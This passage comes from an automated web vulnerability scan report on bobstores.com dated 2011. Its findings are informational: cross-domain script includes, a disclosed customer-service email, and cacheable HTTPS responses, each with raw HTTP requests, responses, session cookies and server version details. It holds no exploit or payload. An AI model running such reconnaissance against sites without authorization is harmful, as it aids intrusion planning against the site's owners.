Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9421

<!DOCTYPE html>
<head>
   <meta charset="utf-8" />
   <link rel="shortcut icon" href="https://www.bobstores.com/favicon.ico" />
   <link rel="apple-touch-icon" href="/apple-touch-icon.png">
       
   <meta
...[SNIP]...
<!-- script START -->
   <script type="text/javascript" src="http://code.jquery.com/jquery-1.4.2.min.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"></script>
...[SNIP]...
<p>        <script type="text/javascript" src="https://seal.thawte.comgetthawteseal?host_name=www.bobstores.com&amp;size=M&amp;lang=en"></script>
...[SNIP]...

2.13. https://www.bobstores.com/rewards/check-your-points/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bobstores.com
Path:   /rewards/check-your-points/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /rewards/check-your-points/ HTTP/1.1
Host: www.bobstores.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=136910627.1293973237.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bobs%20stores; PHPSESSID=t5fv28tgf4m0o3h9518iibs8f1; __utma=136910627.1391851172.1293973237.1293973237.1293973237.1; __utmc=136910627; __utmb=136910627.12.10.1293973237;

Response

HTTP/1.1 302 Found
Date: Sun, 02 Jan 2011 13:14:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.bobstores.com/xmlrpc.php
Location: http://www.bobstores.com/rewards/check-your-points/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9437

<!DOCTYPE html>
<head>
   <meta charset="utf-8" />
   <link rel="shortcut icon" href="https://www.bobstores.com/favicon.ico" />
   <link rel="apple-touch-icon" href="/apple-touch-icon.png">
       
   <meta
...[SNIP]...
<!-- script START -->
   <script type="text/javascript" src="http://code.jquery.com/jquery-1.4.2.min.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"></script>
...[SNIP]...
<p>    <script type="text/javascript" src="https://seal.thawte.comgetthawteseal?host_name=www.bobstores.com&amp;size=M&amp;lang=en"></script>
...[SNIP]...

2.14. https://www.bobstores.com/rewards/email-signup  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bobstores.com
Path:   /rewards/email-signup

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /rewards/email-signup HTTP/1.1
Host: www.bobstores.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=136910627.1293973237.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bobs%20stores; PHPSESSID=t5fv28tgf4m0o3h9518iibs8f1; __utma=136910627.1391851172.1293973237.1293973237.1293973237.1; __utmc=136910627; __utmb=136910627.12.10.1293973237;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:13:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.bobstores.com/xmlrpc.php
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12516

<!DOCTYPE html>
<head>
   <meta charset="utf-8" />
   <link rel="shortcut icon" href="https://www.bobstores.com/favicon.ico" />
   <link rel="apple-touch-icon" href="/apple-touch-icon.png">
       
   <meta
...[SNIP]...
<!-- script START -->
   <script type="text/javascript" src="http://code.jquery.com/jquery-1.4.2.min.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"></script>
...[SNIP]...

2.15. https://www.bobstores.com/seasonal-promo/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bobstores.com
Path:   /seasonal-promo/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /seasonal-promo/ HTTP/1.1
Host: www.bobstores.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=136910627.1293973237.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bobs%20stores; PHPSESSID=t5fv28tgf4m0o3h9518iibs8f1; __utma=136910627.1391851172.1293973237.1293973237.1293973237.1; __utmc=136910627; __utmb=136910627.12.10.1293973237;

Response

HTTP/1.1 302 Found
Date: Sun, 02 Jan 2011 13:15:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.bobstores.com/xmlrpc.php
Location: http://www.bobstores.com/seasonal-promo/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10472

<!DOCTYPE html>
<head>
   <meta charset="utf-8" />
   <link rel="shortcut icon" href="https://www.bobstores.com/favicon.ico" />
   <link rel="apple-touch-icon" href="/apple-touch-icon.png">
       
   <meta
...[SNIP]...
<!-- script START -->
   <script type="text/javascript" src="http://code.jquery.com/jquery-1.4.2.min.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"></script>
...[SNIP]...

2.16. https://www.bobstores.com/store-locator  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bobstores.com
Path:   /store-locator

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /store-locator HTTP/1.1
Host: www.bobstores.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=136910627.1293973237.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bobs%20stores; PHPSESSID=t5fv28tgf4m0o3h9518iibs8f1; __utma=136910627.1391851172.1293973237.1293973237.1293973237.1; __utmc=136910627; __utmb=136910627.12.10.1293973237;

Response

HTTP/1.1 302 Found
Date: Sun, 02 Jan 2011 13:16:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.bobstores.com/xmlrpc.php
Location: http://www.bobstores.com/store-locator
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9633

<!DOCTYPE html>
<head>
   <meta charset="utf-8" />
   <link rel="shortcut icon" href="https://www.bobstores.com/favicon.ico" />
   <link rel="apple-touch-icon" href="/apple-touch-icon.png">
       
   <meta
...[SNIP]...
<!-- script START -->
   <script type="text/javascript" src="http://code.jquery.com/jquery-1.4.2.min.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"></script>
...[SNIP]...

2.17. https://www.bobstores.com/terms-conditions/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bobstores.com
Path:   /terms-conditions/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /terms-conditions/ HTTP/1.1
Host: www.bobstores.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=136910627.1293973237.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bobs%20stores; PHPSESSID=t5fv28tgf4m0o3h9518iibs8f1; __utma=136910627.1391851172.1293973237.1293973237.1293973237.1; __utmc=136910627; __utmb=136910627.12.10.1293973237;

Response

HTTP/1.1 302 Found
Date: Sun, 02 Jan 2011 13:15:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.bobstores.com/xmlrpc.php
Location: http://www.bobstores.com/terms-conditions/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13217

<!DOCTYPE html>
<head>
   <meta charset="utf-8" />
   <link rel="shortcut icon" href="https://www.bobstores.com/favicon.ico" />
   <link rel="apple-touch-icon" href="/apple-touch-icon.png">
       
   <meta
...[SNIP]...
<!-- script START -->
   <script type="text/javascript" src="http://code.jquery.com/jquery-1.4.2.min.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"></script>
...[SNIP]...

2.18. https://www.bobstores.com/wp-content/themes/bobs/ie.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bobstores.com
Path:   /wp-content/themes/bobs/ie.css

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /wp-content/themes/bobs/ie.css HTTP/1.1
Host: www.bobstores.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=136910627.1293973237.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bobs%20stores; PHPSESSID=t5fv28tgf4m0o3h9518iibs8f1; __utma=136910627.1391851172.1293973237.1293973237.1293973237.1; __utmc=136910627; __utmb=136910627.12.10.1293973237;

Response

HTTP/1.1 302 Found
Date: Sun, 02 Jan 2011 13:15:03 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.bobstores.com/xmlrpc.php
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 02 Jan 2011 13:15:04 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.bobstores.com/wp-content/themes/bobs/ie.css
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8964

<!DOCTYPE html>
<head>
   <meta charset="utf-8" />
   <link rel="shortcut icon" href="https://www.bobstores.com/favicon.ico" />
   <link rel="apple-touch-icon" href="/apple-touch-icon.png">
       
   <meta
...[SNIP]...
<!-- script START -->
   <script type="text/javascript" src="http://code.jquery.com/jquery-1.4.2.min.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"></script>
...[SNIP]...

2.19. https://www.bobstores.com/wp-content/themes/bobs/images/bg_nav_on.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bobstores.com
Path:   /wp-content/themes/bobs/images/bg_nav_on.jpg

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /wp-content/themes/bobs/images/bg_nav_on.jpg HTTP/1.1
Host: www.bobstores.com
Connection: keep-alive
Referer: https://www.bobstores.com/rewards/check-your-points
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=t5fv28tgf4m0o3h9518iibs8f1; __utmz=136910627.1293973237.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bobs%20stores; __utma=136910627.1391851172.1293973237.1293973237.1293973237.1; __utmc=136910627; __utmb=136910627.12.10.1293973237

Response

HTTP/1.1 302 Found
Date: Sun, 02 Jan 2011 13:32:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.bobstores.com/xmlrpc.php
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 02 Jan 2011 13:32:31 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.bobstores.com/wp-content/themes/bobs/images/bg_nav_on.jpg
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8978

<!DOCTYPE html>
<head>
   <meta charset="utf-8" />
   <link rel="shortcut icon" href="https://www.bobstores.com/favicon.ico" />
   <link rel="apple-touch-icon" href="/apple-touch-icon.png">
       
   <meta
...[SNIP]...
<!-- script START -->
   <script type="text/javascript" src="http://code.jquery.com/jquery-1.4.2.min.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"></script>
...[SNIP]...

3. Email addresses disclosed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bobstores.com
Path:   /terms-conditions/

Issue detail

The following email address was disclosed in the response:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

Request

GET /terms-conditions/ HTTP/1.1
Host: www.bobstores.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=136910627.1293973237.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bobs%20stores; PHPSESSID=t5fv28tgf4m0o3h9518iibs8f1; __utma=136910627.1391851172.1293973237.1293973237.1293973237.1; __utmc=136910627; __utmb=136910627.12.10.1293973237;

Response

HTTP/1.1 302 Found
Date: Sun, 02 Jan 2011 13:15:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.bobstores.com/xmlrpc.php
Location: http://www.bobstores.com/terms-conditions/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13217

<!DOCTYPE html>
<head>
   <meta charset="utf-8" />
   <link rel="shortcut icon" href="https://www.bobstores.com/favicon.ico" />
   <link rel="apple-touch-icon" href="/apple-touch-icon.png">
       
   <meta
...[SNIP]...
<a href="mailto:customerservice@bobstores.com">
...[SNIP]...

4. Cacheable HTTPS response  previous
There are 4 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


4.1. https://www.bobstores.com/comments/feed/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bobstores.com
Path:   /comments/feed/

Request

GET /comments/feed/ HTTP/1.1
Host: www.bobstores.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=136910627.1293973237.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bobs%20stores; PHPSESSID=t5fv28tgf4m0o3h9518iibs8f1; __utma=136910627.1391851172.1293973237.1293973237.1293973237.1; __utmc=136910627; __utmb=136910627.12.10.1293973237;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:14:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.bobstores.com/xmlrpc.php
Last-Modified: Mon, 01 Nov 2010 18:40:28 GMT
ETag: "90bf8a772bea2a8649299cf2303f1b61"
Content-Length: 1429
Connection: close
Content-Type: text/xml; charset=UTF-8

<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
   xmlns:content="http://purl.org/rss/1.0/modules/content/"
   xmlns:dc="http://purl.org/dc/elements/1.1/"
   xmlns:atom="http://www.w3.org/2005/Atom
...[SNIP]...

4.2. https://www.bobstores.com/rewards/check-your-points/feed/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bobstores.com
Path:   /rewards/check-your-points/feed/

Request

GET /rewards/check-your-points/feed/ HTTP/1.1
Host: www.bobstores.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=136910627.1293973237.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bobs%20stores; PHPSESSID=t5fv28tgf4m0o3h9518iibs8f1; __utma=136910627.1391851172.1293973237.1293973237.1293973237.1; __utmc=136910627; __utmb=136910627.12.10.1293973237;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:13:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.bobstores.com/xmlrpc.php
Last-Modified: Mon, 01 Nov 2010 18:40:28 GMT
ETag: "90bf8a772bea2a8649299cf2303f1b61"
Content-Length: 743
Connection: close
Content-Type: text/xml; charset=UTF-8

<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
   xmlns:content="http://purl.org/rss/1.0/modules/content/"
   xmlns:dc="http://purl.org/dc/elements/1.1/"
   xmlns:atom="http://www.w3.org/2005/Atom
...[SNIP]...

4.3. https://www.bobstores.com/wp-includes/wlwmanifest.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bobstores.com
Path:   /wp-includes/wlwmanifest.xml

Request

GET /wp-includes/wlwmanifest.xml HTTP/1.1
Host: www.bobstores.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=136910627.1293973237.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bobs%20stores; PHPSESSID=t5fv28tgf4m0o3h9518iibs8f1; __utma=136910627.1391851172.1293973237.1293973237.1293973237.1; __utmc=136910627; __utmb=136910627.12.10.1293973237;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:15:22 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 01 Nov 2010 18:32:19 GMT
ETag: "6348345-41d-49402073b12c0"
Accept-Ranges: bytes
Content-Length: 1053
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8" ?>

<manifest xmlns="http://schemas.microsoft.com/wlw/manifest/weblog">

<options>
<clientType>WordPress</clientType>
   <supportsKeywords>Yes</supportsKeyword
...[SNIP]...

4.4. https://www.bobstores.com/xmlrpc.php  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bobstores.com
Path:   /xmlrpc.php

Request

GET /xmlrpc.php HTTP/1.1
Host: www.bobstores.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=136910627.1293973237.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bobs%20stores; PHPSESSID=t5fv28tgf4m0o3h9518iibs8f1; __utma=136910627.1391851172.1293973237.1293973237.1293973237.1; __utmc=136910627; __utmb=136910627.12.10.1293973237;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:15:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 42
Connection: close
Content-Type: text/plain; charset=UTF-8

XML-RPC server accepts POST requests only.

Report generated by XSS.CX at Sun Jan 02 07:46:30 CST 2011.